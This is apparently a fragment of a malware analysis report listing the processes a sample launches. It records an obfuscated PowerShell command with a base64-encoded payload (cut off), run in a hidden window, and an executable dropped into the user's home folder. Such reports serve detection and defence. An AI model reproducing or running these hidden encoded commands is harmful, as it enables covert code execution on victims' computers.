Technical information
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAG4AZABwAGMAegBzAGoAcgA9ACcAUgBiAHQAYgBiAHUAaQBhAG0AdwBiAG8AJwA7ACQAQgBrAHYAbgByAGwAagBsAGYAIAA9ACAAJwAzADUAMgAnADsAJABaAGYAeABpAHUAZQBoAHYAYgB2AD0AJwBaAGkAbwBsAG0AbgBpAHQAdAAnADsAJAB...
- %HOMEPATH%\352.exe
- %HOMEPATH%\352.exe
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAG4AZABwAGMAegBzAGoAcgA9ACcAUgBiAHQAYgBiAHUAaQBhAG0AdwBiAG8AJwA7ACQAQgBrAHYAbgByAGwAagBsAGYAIAA9ACAAJwAzADUAMgAnADsAJABaAGYAeABpAHUAZQBoAHYAYgB2AD0AJwBaAGkAbwBsAG0AbgBpAHQAdAAnADsAJAB...' (with hidden window)